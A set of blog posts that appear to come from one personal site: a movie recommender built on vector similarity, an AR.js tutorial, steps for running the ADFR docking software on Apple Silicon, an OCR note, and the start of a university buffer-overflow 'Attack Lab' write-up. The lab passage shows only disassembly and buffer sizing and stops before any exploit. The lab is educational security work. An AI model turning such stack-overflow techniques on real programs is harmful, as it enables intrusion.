To find similar items, we will first have to map the name of the movie to its trakt_id, get the embeddings we have for that id and then perform a similarity search. It is possible that this additional step of mapping could be avoided by storing information as metadata in the index.
def get_trakt_id(df, title: str):
rec = df[df["title"].str.lower()==movie_name.lower()]
if len(rec.trakt_id.values.tolist()) > 1:
print(f"multiple values found... {len(rec.trakt_id.values)}")
for x in range(len(rec)):
print(f"[{x}] {rec['title'].tolist()[x]} ({rec['year'].tolist()[x]}) - {rec['overview'].tolist()}")
print("===")
z = int(input("Choose No: "))
return rec.trakt_id.values[z]
return rec.trakt_id.values[0]
def get_vector_value(trakt_id: int):
fetch_response = index.fetch(ids=[str(trakt_id)])
return fetch_response["vectors"][str(trakt_id)]["values"]
def query_vectors(vector: list, top_k: int = 20, include_values: bool = False, include_metada: bool = True):
query_response = index.query(
queries=[
(vector),
],
top_k=top_k,
include_values=include_values,
include_metadata=include_metada
)
return query_response
def query2ids(query_response):
trakt_ids = []
for match in query_response["results"][0]["matches"]:
trakt_ids.append(int(match["id"]))
return trakt_ids
def get_deets_by_trakt_id(df, trakt_id: int):
df = df[df["trakt_id"]==trakt_id]
return {
"title": df.title.values[0],
"overview": df.overview.values[0],
"runtime": df.runtime.values[0],
"year": df.year.values[0]
}
movie_name = "Now You See Me"
movie_trakt_id = get_trakt_id(df, movie_name)
print(movie_trakt_id)
movie_vector = get_vector_value(movie_trakt_id)
movie_queries = query_vectors(movie_vector)
movie_ids = query2ids(movie_queries)
print(movie_ids)
for trakt_id in movie_ids:
deets = get_deets_by_trakt_id(df, trakt_id)
print(f"{deets['title']} ({deets['year']}): {deets['overview']}")
Output:
55786
[55786, 18374, 299592, 662622, 6054, 227458, 139687, 303950, 70000, 129307, 70823, 5766, 23950, 137696, 655723, 32842, 413269, 145994, 197990, 373832]
Now You See Me (2013): An FBI agent and an Interpol detective track a team of illusionists who pull off bank heists during their performances and reward their audiences with the money.
Trapped (1949): U.S. Treasury Department agents go after a ring of counterfeiters.
Brute Sanity (2018): An FBI-trained neuropsychologist teams up with a thief to find a reality-altering device while her insane ex-boss unleashes bizarre traps to stop her.
The Chase (2017): Some FBI agents hunt down a criminal
Surveillance (2008): An FBI agent tracks a serial killer with the help of three of his would-be victims - all of whom have wildly different stories to tell.
Marauders (2016): An untraceable group of elite bank robbers is chased by a suicidal FBI agent who uncovers a deeper purpose behind the robbery-homicides.
Miracles for Sale (1939): A maker of illusions for magicians protects an ingenue likely to be murdered.
Deceptors (2005): A Ghostbusters knock-off where a group of con-artists create bogus monsters to scare up some cash. They run for their lives when real spooks attack.
The Outfit (1993): A renegade FBI agent sparks an explosive mob war between gangster crime lords Legs Diamond and Dutch Schultz.
Bank Alarm (1937): A federal agent learns the gangsters he's been investigating have kidnapped his sister.
The Courier (2012): A shady FBI agent recruits a courier to deliver a mysterious package to a vengeful master criminal who has recently resurfaced with a diabolical plan.
After the Sunset (2004): An FBI agent is suspicious of two master thieves, quietly enjoying their retirement near what may - or may not - be the biggest score of their careers.
Down Three Dark Streets (1954): An FBI Agent takes on the three unrelated cases of a dead agent to track down his killer.
The Executioner (1970): A British intelligence agent must track down a fellow spy suspected of being a double agent.
Ace of Cactus Range (1924): A Secret Service agent goes undercover to unmask the leader of a gang of diamond thieves.
Firepower (1979): A mercenary is hired by the FBI to track down a powerful recluse criminal, a woman is also trying to track him down for her own personal vendetta.
Heroes & Villains (2018): an FBI agent chases a thug to great tunes
Federal Fugitives (1941): A government agent goes undercover in order to apprehend a saboteur who caused a plane crash.
Hell on Earth (2012): An FBI Agent on the trail of a group of drug traffickers learns that their corruption runs deeper than she ever imagined, and finds herself in a supernatural - and deadly - situation.
Spies (2015): A secret agent must perform a heist without time on his side
For now, I am happy with the recommendations.
The code for the flask app can be found on GitHub: navanchauhan/FlixRec or on my Gitea instance
I quickly whipped up a simple Flask App to deal with problems of multiple movies sharing the title, and typos in the search query.
Includes additional filter options
Test it out at https://flixrec.navan.dev
2024 % 4 == 0
Another revolution around the sun! This was a pretty fun and interesting year. I got to work on some interesting projects, and learned a lot.
I am going to try and use my GitHub activity to recap.
Summer was more relaxing. I mainly worked on some maintenance patches for my projects, and did some more freelancing stuff.
After the end of the fall semester I ended up getting my wisdom tooth removed. Took me out for 10 days.
I also did a ton of other stuff, but I am not sure how much I want to be sharing on my blog here. Maybe as I write more I will get more comfortable with sharing more information.
So, what are my plans for 2024? Learn. Build. Ship.
Other goals:
AR.js is a lightweight library for Augmented Reality on the Web, coming with features like Image Tracking, Location based AR and Marker tracking. It is the easiest option for cross-browser augmented reality.
The same code works for iOS, Android, Desktops and even VR Browsers!
It was initially created by Jerome Etienne and is now maintained by Nicolo Carpignoli and the AR-js Organisation
Usually for augmented reality you need specialised markers, like this Hiro marker (notice the thick non-aesthetic borders 🤢)
This is called marker based tracking where the code knows what to look for. NFT or Natural Feature Tracing converts normal images into markers by extracting 'features' from it, this way you can use any image of your liking!
I'll be using my GitHub profile picture
First we need to create the marker files required by AR.js for NFT. For this we use Carnaux's repository 'NFT-Marker-Creator'.
$ git clone https://github.com/Carnaux/NFT-Marker-Creator
Cloning into 'NFT-Marker-Creator'...
remote: Enumerating objects: 79, done.
remote: Counting objects: 100% (79/79), done.
remote: Compressing objects: 100% (72/72), done.
remote: Total 580 (delta 10), reused 59 (delta 7), pack-reused 501
Receiving objects: 100% (580/580), 9.88 MiB | 282.00 KiB/s, done.
Resolving deltas: 100% (262/262), done.
$ cd NFT-Makrer-Creator
$ npm install
npm WARN nodegenerator@1.0.0 No repository field.
added 67 packages from 56 contributors and audited 67 packages in 2.96s
1 package is looking for funding
run `npm fund` for details
found 0 vulnerabilities
╭────────────────────────────────────────────────────────────────╮
│ │
│ New patch version of npm available! 6.14.5 → 6.14.7 │
│ Changelog: https://github.com/npm/cli/releases/tag/v6.14.7 │
│ Run npm install -g npm to update! │
│ │
╰────────────────────────────────────────────────────────────────╯
$ cp ~/CodingAndStuff/ARjs/me.png .
$ node app.js -i me.png
Confidence level: [ * * * * * ] 5/5 || Entropy: 5.24 || Current max: 5.17 min: 4.6
Do you want to continue? (Y/N)
y
writeStringToMemory is deprecated and should not be called! Use stringToUTF8() instead!
[info]
Commands:
[info] --
Generator started at 2020-08-01 16:01:41 +0580
[info] Tracking Extraction Level = 2
[info] MAX_THRESH = 0.900000
[info] MIN_THRESH = 0.550000
[info] SD_THRESH = 8.000000
[info] Initialization Extraction Level = 1
[info] SURF_FEATURE = 100
[info] min allow 3.699000.
[info] Image DPI (1): 3.699000
[info] Image DPI (2): 4.660448
[info] Image DPI (3): 5.871797
[info] Image DPI (4): 7.398000
[info] Image DPI (5): 9.320896
[info] Image DPI (6): 11.743593
[info] Image DPI (7): 14.796000
[info] Image DPI (8): 18.641792
[info] Image DPI (9): 23.487186
[info] Image DPI (10): 29.592001
[info] Image DPI (11): 37.283585
[info] Image DPI (12): 46.974373
[info] Image DPI (13): 59.184002
[info] Image DPI (14): 72.000000
[info] Generating ImageSet...
[info] (Source image xsize=568, ysize=545, channels=3, dpi=72.0).
[info] Done.
[info] Saving to asa.iset...
[info] Done.
[info] Generating FeatureList...
...
[info] (46, 44) 5.871797[dpi]
[info] Freak features - 23[info] ========= 23 ===========
[info] (37, 35) 4.660448[dpi]
[info] Freak features - 19[info] ========= 19 ===========
[info] (29, 28) 3.699000[dpi]
[info] Freak features - 9[info] ========= 9 ===========
[info] Done.
[info] Saving FeatureSet3...
[info] Done.
[info] Generator finished at 2020-08-01 16:02:02 +0580
--
Finished marker creation!
Now configuring demo!
Finished!
To run demo use: 'npm run demo'
Now we have the required files in the output folder
$ ls output
me.fset me.fset3 me.iset
Create a new file called index.html
in your project folder. This is the basic template we are going to use. Replace me
with the root filename of your image, for example NeverGonnaGiveYouUp.png
will become NeverGonnaGiveYouUp
. Make sure you have copied all three files from the output folder in the previous step to the root of your project folder.
<script src="https://cdn.jsdelivr.net/gh/aframevr/aframe@1c2407b26c61958baa93967b5412487cd94b290b/dist/aframe-master.min.js"></script>
<script src="https://raw.githack.com/AR-js-org/AR.js/master/aframe/build/aframe-ar-nft.js"></script>
<style>
.arjs-loader {
height: 100%;
width: 100%;
position: absolute;
top: 0;
left: 0;
background-color: rgba(0, 0, 0, 0.8);
z-index: 9999;
display: flex;
justify-content: center;
align-items: center;
}
.arjs-loader div {
text-align: center;
font-size: 1.25em;
color: white;
}
</style>
<body style="margin : 0px; overflow: hidden;">
<div class="arjs-loader">
<div>Calculating Image Descriptors....</div>
</div>
<a-scene
vr-mode-ui="enabled: false;"
renderer="logarithmicDepthBuffer: true;"
embedded
arjs="trackingMethod: best; sourceType: webcam;debugUIEnabled: false;"
>
<a-nft
type="nft"
url="./me"
smooth="true"
smoothCount="10"
smoothTolerance=".01"
smoothThreshold="5"
>
</a-nft>
<a-entity camera></a-entity>
</a-scene>
</body>
In this we are creating a AFrame scene and we are telling it that we want to use NFT Tracking. The amazing part about using AFrame is that we are able to use all AFrame objects!
Let us add a simple box!
<a-nft .....>
<a-box position='100 0.5 -180' material='opacity: 0.5; side: double' scale="100 100 100"></a-box>
</a-nft>
Now to test it out we will need to create a simple server, I use Python's inbuilt SimpleHTTPServer
alongside ngrok
In one terminal window, cd
to the project directory. Currently your project folder should have 4 files, index.html
, me.fset3
, me.fset
and me.iset
Open up two terminal windows and cd
into your project folder then run the following commands to start up your server.
In the first terminal window start the Python Server
$ cd ~/CodingAndStuff/ARjs
$ python2 -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
In the other window run ngrok
( Make sure you have installed it prior to running this step )
$ ngrok http 8000
Now copy the url to your phone and try running the example
👏 Congratulations! You just built an Augmented Reality experience using AR.js and AFrame
Edit your index.html
<a-nft ..>
<a-box ..>
<a-torus-knot radius='0.26' radius-tubular='0.05' ></a-torus-knot>
</ a-box>
</ a-nft>
Now that we know how to place a box in the scene and add a torus knot in it, what do we do next? We bring the classic internet back!
AFrame GIF Shader
is a gif shader for A-Frame created by mayognaise.
Add <script src="https://rawgit.com/mayognaise/aframe-gif-shader/master/dist/aframe-gif-shader.min.js"></script>
to <head>
Change the box's material to add the GIF shader
...
<a-box position='100 0.5 -180' material="shader:gif;src:url(https://media.tenor.com/images/412b1aa9149d98d561df62db221e0789/tenor.gif);opacity:.5" .....>
Here is a screenshot of me scanning a rounded version of my profile picture ( It still works! Even though the image is cropped and I haven't changed any line of code )
]]>We are going to be running everything through Rosetta 2. I am confident that if I had access to the original source code, I could find a way to run everything natively.
These are the following issues that we will be fixing in this part:
For the sake of simplicity, I am assuming that I am running all these commands in the folder ~/Developer/scrippstuff/
We are going to run all of these steps in the terminal
/usr/sbin/softwareupdate --install-rosetta --agree-to-license
Both versions of homebrew (x86 and arm64) can peacefully coexist on your system.
From now on, every command should be run in a terminal session that starts with this as the first command:
arch -x86_64 zsh
Now, we can install homebrew:
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
Here is my output:
➜ scrippstuff uname -a
Darwin Navans-MacBook-Pro.local 23.3.0 Darwin Kernel Version 23.3.0: Wed Dec 20 21:31:00 PST 2023; root:xnu-10002.81.5~7/RELEASE_ARM64_T6020 x86_64
➜ scrippstuff /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
==> Checking for `sudo` access (which may request your password)...
Password:
==> This script will install:
/usr/local/bin/brew
/usr/local/share/doc/homebrew
/usr/local/share/man/man1/brew.1
/usr/local/share/zsh/site-functions/_brew
/usr/local/etc/bash_completion.d/brew
/usr/local/Homebrew
==> The following new directories will be created:
/usr/local/Cellar
/usr/local/Caskroom
Press RETURN/ENTER to continue or any other key to abort:
==> /usr/bin/sudo /bin/mkdir -p /usr/local/Cellar /usr/local/Caskroom
==> /usr/bin/sudo /bin/chmod ug=rwx /usr/local/Cellar /usr/local/Caskroom
==> /usr/bin/sudo /usr/sbin/chown navanchauhan /usr/local/Cellar /usr/local/Caskroom
==> /usr/bin/sudo /usr/bin/chgrp admin /usr/local/Cellar /usr/local/Caskroom
==> /usr/bin/sudo /usr/sbin/chown -R navanchauhan:admin /usr/local/Homebrew
==> /usr/bin/sudo /bin/mkdir -p /Users/navanchauhan/Library/Caches/Homebrew
==> /usr/bin/sudo /bin/chmod g+rwx /Users/navanchauhan/Library/Caches/Homebrew
==> /usr/bin/sudo /usr/sbin/chown -R navanchauhan /Users/navanchauhan/Library/Caches/Homebrew
==> Downloading and installing Homebrew...
remote: Enumerating objects: 47, done.
remote: Counting objects: 100% (47/47), done.
remote: Compressing objects: 100% (19/19), done.
remote: Total 47 (delta 28), reused 47 (delta 28), pack-reused 0
Unpacking objects: 100% (47/47), 6.11 KiB | 223.00 KiB/s, done.
From https://github.com/Homebrew/brew
+ 18ebdd8c8f...67a096fcbb tapioca-compiler-for-tty-rbi -> origin/tapioca-compiler-for-tty-rbi (forced update)
Switched to and reset branch 'stable'
==> Updating Homebrew...
==> Installation successful!
==> Homebrew has enabled anonymous aggregate formulae and cask analytics.
Read the analytics documentation (and how to opt-out) here:
https://docs.brew.sh/Analytics
No analytics data has been sent yet (nor will any be during this install run).
==> Homebrew is run entirely by unpaid volunteers. Please consider donating:
https://github.com/Homebrew/brew#donations
==> Next steps:
- Run these two commands in your terminal to add Homebrew to your PATH:
(echo; echo 'eval "$(/usr/local/bin/brew shellenv)"') >> /Users/navanchauhan/.zprofile
eval "$(/usr/local/bin/brew shellenv)"
- Run brew help to get started
- Further documentation:
https://docs.brew.sh
At this point, you don't need to edit your zshrc
or zsh_profile
.
The reason we are installing pyenv is because it is easier to build Python 2.7.18 from scratch than messing around with codesigning and quarantine bs on macOS.
➜ scrippstuff brew install pyenv
==> Downloading https://ghcr.io/v2/homebrew/core/pyenv/manifests/2.3.36
############################################################################################################################################################### 100.0%
==> Fetching dependencies for pyenv: m4, autoconf, ca-certificates, openssl@3, pkg-config and readline
==> Downloading https://ghcr.io/v2/homebrew/core/m4/manifests/1.4.19
############################################################################################################################################################### 100.0%
==> Fetching m4
==> Downloading https://ghcr.io/v2/homebrew/core/m4/blobs/sha256:8434a67a4383836b2531a6180e068640c5b482ee6781b673d65712e4fc86ca76
############################################################################################################################################################### 100.0%
==> Downloading https://ghcr.io/v2/homebrew/core/autoconf/manifests/2.72
############################################################################################################################################################### 100.0%
==> Fetching autoconf
==> Downloading https://ghcr.io/v2/homebrew/core/autoconf/blobs/sha256:12368e33b89d221550ba9e261b0c6ece0b0e89250fb4c95169d09081e0ebb2dd
############################################################################################################################################################### 100.0%
==> Downloading https://ghcr.io/v2/homebrew/core/ca-certificates/manifests/2024-03-11
############################################################################################################################################################### 100.0%
==> Fetching ca-certificates
==> Downloading https://ghcr.io/v2/homebrew/core/ca-certificates/blobs/sha256:cab828953672906e00a8f25db751977b8dc4115f021f8dfe82b644ade03dacdb
############################################################################################################################################################### 100.0%
==> Downloading https://ghcr.io/v2/homebrew/core/openssl/3/manifests/3.2.1-1
############################################################################################################################################################### 100.0%
==> Fetching openssl@3
==> Downloading https://ghcr.io/v2/homebrew/core/openssl/3/blobs/sha256:ef8211c5115fc85f01261037f8fea76cc432b92b4fb23bc87bbf41e9198fcc0f
############################################################################################################################################################### 100.0%
==> Downloading https://ghcr.io/v2/homebrew/core/pkg-config/manifests/0.29.2_3
############################################################################################################################################################### 100.0%
==> Fetching pkg-config
==> Downloading https://ghcr.io/v2/homebrew/core/pkg-config/blobs/sha256:421571f340277c62c5cc6fd68737bd7c4e085de113452ea49b33bcd46509bb12
############################################################################################################################################################### 100.0%
==> Downloading https://ghcr.io/v2/homebrew/core/readline/manifests/8.2.10
############################################################################################################################################################### 100.0%
==> Fetching readline
==> Downloading https://ghcr.io/v2/homebrew/core/readline/blobs/sha256:9796e0ff1cc29ae7e75d8fc1a3e2c5e8ae2aeade8d9d59a16363306bf6c5b8f4
############################################################################################################################################################### 100.0%
==> Fetching pyenv
==> Downloading https://ghcr.io/v2/homebrew/core/pyenv/blobs/sha256:d117a99ed53502aff29109bfa366693ca623f2326e1e6b4db68fef7b7f63eeba
############################################################################################################################################################### 100.0%
==> Installing dependencies for pyenv: m4, autoconf, ca-certificates, openssl@3, pkg-config and readline
==> Installing pyenv dependency: m4
==> Downloading https://ghcr.io/v2/homebrew/core/m4/manifests/1.4.19
Already downloaded: /Users/navanchauhan/Library/Caches/Homebrew/downloads/5b2a7f715487b7377e409e8ca58569040cd89f33859f691210c58d94410fd33b--m4-1.4.19.bottle_manifest.json
==> Pouring m4--1.4.19.sonoma.bottle.tar.gz
🍺 /usr/local/Cellar/m4/1.4.19: 13 files, 739.9KB
==> Installing pyenv dependency: autoconf
==> Downloading https://ghcr.io/v2/homebrew/core/autoconf/manifests/2.72
Already downloaded: /Users/navanchauhan/Library/Caches/Homebrew/downloads/b73cdb320c4261bbf8d02d03e50dc755c869c5859c1d4e93616898fc7cd939ff--autoconf-2.72.bottle_manifest.json
==> Pouring autoconf--2.72.sonoma.bottle.tar.gz
🍺 /usr/local/Cellar/autoconf/2.72: 71 files, 3.6MB
==> Installing pyenv dependency: ca-certificates
==> Downloading https://ghcr.io/v2/homebrew/core/ca-certificates/manifests/2024-03-11
Already downloaded: /Users/navanchauhan/Library/Caches/Homebrew/downloads/c431e0186df2ccc2ea942b34a3c26c2cebebec8e07ad6abdae48447a52c5f506--ca-certificates-2024-03-11.bottle_manifest.json
==> Pouring ca-certificates--2024-03-11.all.bottle.tar.gz
==> Regenerating CA certificate bundle from keychain, this may take a while...
🍺 /usr/local/Cellar/ca-certificates/2024-03-11: 3 files, 229.6KB
==> Installing pyenv dependency: openssl@3
==> Downloading https://ghcr.io/v2/homebrew/core/openssl/3/manifests/3.2.1-1
Already downloaded: /Users/navanchauhan/Library/Caches/Homebrew/downloads/f7b6e249843882452d784a8cbc4e19231186230b9e485a2a284d5c1952a95ec2--openssl@3-3.2.1-1.bottle_manifest.json
==> Pouring openssl@3--3.2.1.sonoma.bottle.1.tar.gz
🍺 /usr/local/Cellar/openssl@3/3.2.1: 6,874 files, 32.5MB
==> Installing pyenv dependency: pkg-config
==> Downloading https://ghcr.io/v2/homebrew/core/pkg-config/manifests/0.29.2_3
Already downloaded: /Users/navanchauhan/Library/Caches/Homebrew/downloads/ac691fc7ab8ecffba32a837e7197101d271474a3a84cfddcc30c9fd6763ab3c6--pkg-config-0.29.2_3.bottle_manifest.json
==> Pouring pkg-config--0.29.2_3.sonoma.bottle.tar.gz
🍺 /usr/local/Cellar/pkg-config/0.29.2_3: 11 files, 656.4KB
==> Installing pyenv dependency: readline
==> Downloading https://ghcr.io/v2/homebrew/core/readline/manifests/8.2.10
Already downloaded: /Users/navanchauhan/Library/Caches/Homebrew/downloads/4ddd52803319828799f1932d4c7fa8d11c667049b20a56341c0c19246a1be93b--readline-8.2.10.bottle_manifest.json
==> Pouring readline--8.2.10.sonoma.bottle.tar.gz
🍺 /usr/local/Cellar/readline/8.2.10: 50 files, 1.7MB
==> Installing pyenv
==> Pouring pyenv--2.3.36.sonoma.bottle.tar.gz
🍺 /usr/local/Cellar/pyenv/2.3.36: 1,158 files, 3.4MB
==> Running `brew cleanup pyenv`...
Disable this behaviour by setting HOMEBREW_NO_INSTALL_CLEANUP.
Hide these hints with HOMEBREW_NO_ENV_HINTS (see `man brew`).
And, build the last version of Python 2.7
➜ scrippstuff PYENV_ROOT="~/Developer/scrippstuff" pyenv install 2.7.18
python-build: use openssl from homebrew
python-build: use readline from homebrew
Downloading Python-2.7.18.tar.xz...
-> https://www.python.org/ftp/python/2.7.18/Python-2.7.18.tar.xz
Installing Python-2.7.18...
patching file configure
patching file configure.ac
patching file setup.py
patching file 'Mac/Tools/pythonw.c'
patching file setup.py
patching file 'Doc/library/ctypes.rst'
patching file 'Lib/test/test_str.py'
patching file 'Lib/test/test_unicode.py'
patching file 'Modules/_ctypes/_ctypes.c'
patching file 'Modules/_ctypes/callproc.c'
patching file 'Modules/_ctypes/ctypes.h'
patching file 'Modules/_ctypes/callproc.c'
patching file setup.py
patching file 'Mac/Modules/qt/setup.py'
patching file setup.py
python-build: use readline from homebrew
python-build: use zlib from xcode sdk
Installed Python-2.7.18 to /Users/navanchauhan/Developer/scrippstuff/~/Developer/scrippstuff/versions/2.7.18
Test the new installation:
➜ scrippstuff ~/Developer/scrippstuff/\~/Developer/scrippstuff/versions/2.7.18/bin/python2.7
Python 2.7.18 (default, Mar 28 2024, 20:47:13)
[GCC Apple LLVM 15.0.0 (clang-1500.1.0.2.5)] on darwin
Type "help", "copyright", "credits" or "license" for more information.
>>> from random import randint
>>> randint(0,10)
6
>>> exit()
Now, we can compress this newly created Python version into a tar.gz
file to replace the one provided in ADFRsuitex8664Darwin_1.0.tar.gz. Don't forget the .
at the end
➜ scrippstuff tar -C ./\~/Developer/scrippstuff/versions/2.7.18 -czf new.tar.gz .
If you don't already have the tarball, you can download it by:
$ curl -o adfr.tar.gz https://ccsb.scripps.edu/adfr/download/1033/
Uncompress it
$ tar -xvzf adfr.tar.gz
Replace the provided Python archive with the one we created:
$ cd ADFRsuite_x86_64Darwin_1.0
$ mv new.tar.gz Python2.7.tar.gz
Note: For some reason simply copying it doesn't work and you need to use mv
Just to not mess with anything else, I will be installing everything in a folder called clean_install
$ mkdir clean_install
$ ./install.sh -d clean_install
...
ADFRsuite installation complete.
To run agfr, agfrgui, adfr, autosite, about, pythonsh scripts located at:
/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/bin
add /Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/bin to the path environment variable in .cshrc or .bashrc:
.cshrc:
set path = (/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/bin $path)
.bashrc:
export PATH=/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/bin:$PATH
Now, to test agfr
, first run the command (replacing navanchauhan
with yout username)
$ export PATH=/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/bin:$PATH
$ agfr
➜ ADFRsuite_x86_64Darwin_1.0 agfr
==============================
*** Open Babel Error in openLib
/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/lib/openbabel/2.4.1/acesformat.so did not load properly.
Error: dlopen(/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/lib/openbabel/2.4.1/acesformat.so, 0x0009): Library not loaded: /opt/X11/lib/libcairo.2.dylib
Referenced from: <24174F3E-2670-79AC-4F26-F8B49774194A> /Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/lib/openbabel/2.4.1/acesformat.so
Reason: tried: '/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/lib/libcairo.2.dylib' (no such file), '/opt/X11/lib/libcairo.2.dylib' (no such file), '/System/Volumes/Preboot/Cryptexes/OS/opt/X11/lib/libcairo.2.dylib' (no such file), '/opt/X11/lib/libcairo.2.dylib' (no such file), '/usr/local/lib/libcairo.2.dylib' (no such file), '/usr/lib/libcairo.2.dylib' (no such file, not in dyld cache)
==============================
Open Babel Error
$ brew install cairo
$ curl -o tutorial-data.zip https://ccsb.scripps.edu/adcp/download/1063/
$ unzip tutorial-data.zip
$ cd ADCP_tutorial_data/3Q47
$ reduce 3Q47_rec.pdb > 3Q47_recH.pdb
$ reduce 3Q47_pep.pdb > 3Q47_pepH.pdb
$ prepare_receptor -r 3Q47_recH.pdb
$ prepare_ligand -l 3Q47_pepH.pdb
$ agfr -r 3Q47_recH.pdbqt -l 3Q47_pepH.pdbqt -asv 1.1 -o 3Q47
➜ 3Q47 agfr -r 3Q47_recH.pdbqt -l 3Q47_pepH.pdbqt -asv 1.1 -o 3Q47
Traceback (most recent call last):
File "/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/CCSBpckgs/ADFR/bin/runAGFR.py", line 36, in <module>
from ADFR.utils.runAGFR import runAGFR
File "/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/CCSBpckgs/ADFR/utils/runAGFR.py", line 41, in <module>
from ADFR.utils.maps import flexResStr2flexRes
File "/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/CCSBpckgs/ADFR/utils/maps.py", line 35, in <module>
from ADFRcc.adfr import GridMap
File "/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/CCSBpckgs/ADFRcc/__init__.py", line 34, in <module>
from ADFRcc.adfr import Parameters
File "/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/CCSBpckgs/ADFRcc/adfr.py", line 43, in <module>
import ADFRcc.adfrcc as CPP
File "/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/CCSBpckgs/ADFRcc/adfrcc.py", line 28, in <module>
_adfrcc = swig_import_helper()
File "/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/CCSBpckgs/ADFRcc/adfrcc.py", line 24, in swig_import_helper
_mod = imp.load_module('_adfrcc', fp, pathname, description)
ImportError: dlopen(/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/CCSBpckgs/ADFRcc/_adfrcc.so, 0x0002): Library not loaded: /Users/Shared/mgltoolsDev/src/homebrew/opt/gcc/lib/gcc/8/libgomp.1.dylib
Referenced from: <424BF61E-BF0F-351E-B546-E82EBBD8FBF5> /Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/CCSBpckgs/ADFRcc/_adfrcc.so
Reason: tried: '/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0/clean_install/lib/libgomp.1.dylib' (no such file), '/Users/Shared/mgltoolsDev/src/homebrew/opt/gcc/lib/gcc/8/libgomp.1.dylib' (no such file), '/System/Volumes/Preboot/Cryptexes/OS/Users/Shared/mgltoolsDev/src/homebrew/opt/gcc/lib/gcc/8/libgomp.1.dylib' (no such file), '/Users/Shared/mgltoolsDev/src/homebrew/opt/gcc/lib/gcc/8/libgomp.1.dylib' (no such file), '/usr/local/lib/libgomp.1.dylib' (no such file), '/usr/lib/libgomp.1.dylib' (no such file, not in dyld cache)
➜ 3Q47
Sometimes this error is simply outputted as a segmentation fault. But, it is because it cannot find the libgomp.1.dylib
. I haven't tested using a newer version of GCC to make it work. Building GCC 8 yourself is absolutely painful. We are going to use a copy generated by the homebrew team.
$ cd ../../
$ pwd
/Users/navanchauhan/Developer/scrippstuff/ADFRsuite_x86_64Darwin_1.0
$ curl -L -H "Authorization: Bearer QQ==" -o gcc8amd64.tar.gz https://ghcr.io/v2/homebrew/core/gcc/8/blobs/sha256:438d5902e5f21a5e8acb5920f1f5684ecfe0c645247d46c8d44c2bbe435966b2
$ tar -xzf gcc8amd64.tar.gz
$ cp -r gcc@8/8.5.0/lib/gcc/8/* clean_install/lib/
Now, we should be able to go back and run the target generation command:
$ cd ADCP_tutorial_data/3Q47
$ agfr -r 3Q47_recH.pdbqt -l 3Q47_pepH.pdbqt -asv 1.1 -o 3Q47
#################################################################
# If you used AGFR in your work, please cite: #
# #
# P.A. Ravindranath S. Forli, D.S. Goodsell, A.J. Olson and #
# M.F. Sanner #
# AutoDockFR: Advances in Protein-Ligand Docking with #
...
$ adcp -t 3Q47.trg -s npisdvd -N 20 -n 1000000 -o 3Q47_redocking -ref 3Q47_pepH.pdb
There you have it. Running ADCP on the newest macOS version against all odds.
I haven't yet looked into fixing/patching agfrgui
as I don't use the software. But, if someone reallllly needs to run it on Apple Silicon, I am happy to take a look at monkeypatching it.
In case years down the line the prebuilt version of GCC 8 is not available, let me know so I can replace the link with my mirror.
]]>Here is the original PDF. I made some edits to the content after generating the markdown file
Paper Website is a service that lets you build a website with just pen and paper. I am going to try and replicate the process.
The continuity feature on macOS + iOS lets you scan PDFs directly from your iPhone. I want to be able to scan these pages and automatically run an Automator script that takes the PDF and OCRs the text. Then I can further clean the text and convert from markdown.
I quickly realised that the OCR software I planned on using could not detect my shitty handwriting accurately. I tried using ABBY Finereader, Prizmo and OCRMyPDF. (Abby Finereader and Prizmo support being automated by Automator).
Now, I could either write neater, or use an external API like Microsoft Azure
In the PDFs, all the scans are saved as images on a page. I extract the image and then send it to Azure's API.
The recognised text had multiple lines breaking in the middle of the sentence, Therefore, I use what is called a pilcrow to specify paragraph breaks. But, rather than trying to draw the normal pilcrow, I just use the HTML entity ¶
which is the pilcrow character.
I created a GitHub Gist for a sample Python script to take the PDF and print the text
A more complete version with Auomator scripts and an entire publishing pipeline will be available as a GitHub and Gitea repo soon.
* In Part 2, I will discuss some more features *
]]>Lab 3 for CSCI 2400 @ CU Boulder - Computer Systems
This assignment involves generating a total of five attacks on two programs having different security vulnerabilities. The directions for this lab are detailed but not difficult to follow. Attack Lab Handout
Again, I like using objdump to disassemble the code.
objdump -d ctarget > dis.txt
From the instructions, we know that our task is to get CTARGET
to execute the code for touch1
when getbuf
executes its return statement, rather than returning to test
Let us try to look into the getbuf
from our disassembled code.
0000000000402608 <getbuf>:
402608: 48 83 ec 18 sub $0x18,%rsp
40260c: 48 89 e7 mov %rsp,%rdi
40260f: e8 95 02 00 00 call 4028a9 <Gets>
402614: b8 01 00 00 00 mov $0x1,%eax
402619: 48 83 c4 18 add $0x18,%rsp
40261d: c3
402608: 48 83 ec 18 sub $0x18,%rsp
We can see that 0x18
(hex) or 24
(decimal) bytes of buffer is allocated to getbuf
(Since, 24 bytes are being subtracted from the stack pointer).
